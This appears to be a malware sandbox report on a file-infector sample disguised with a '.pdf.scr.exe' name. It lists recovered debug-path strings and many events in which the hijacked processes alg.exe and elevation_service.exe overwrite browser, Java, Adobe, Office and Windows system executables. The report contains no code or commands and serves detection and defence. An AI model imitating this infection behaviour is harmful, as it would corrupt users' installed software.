Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.2156038493.0000000001470000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2149245390.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2148327892.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3189590944.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3189700078.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1931467591.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.2019997870.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000008.00000003.3241252093.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1792845772.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000008.00000003.3239648950.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.2183358754.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2186527465.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3193969354.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2078085163.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 00000008.00000003.2885089406.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: elevation_service.exe, 00000008.00000003.2949349411.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 00000008.00000003.2853593033.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.2063806988.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000008.00000003.3248356651.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000008.00000003.3246000080.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: private_browsing.pdbp source: alg.exe, 00000002.00000003.2384944423.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.2096908826.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.2068666301.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000008.00000003.3242799638.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000008.00000003.3243580949.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.2092326400.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1710268245.00000000015C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000008.00000003.3242024385.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: elevation_service.exe, 00000008.00000003.3110281493.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.2030490123.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb="roG)T5n source: RegSvcs.exe, 0000001D.00000002.1952955532.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000008.00000003.3247717995.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000008.00000003.3245192353.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1671928679.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 00000008.00000003.2847524053.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1821426163.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: elevation_service.exe, 00000008.00000003.2925406649.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2916919565.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000008.00000003.3242799638.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000008.00000003.3242024385.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: default-browser-agent.pdb source: alg.exe, 00000002.00000003.2316244743.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdbX source: elevation_service.exe, 00000008.00000003.3008858965.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: updater.pdb source: alg.exe, 00000002.00000003.2406594468.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.2169021270.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.2030490123.0000000001550000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\sppsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

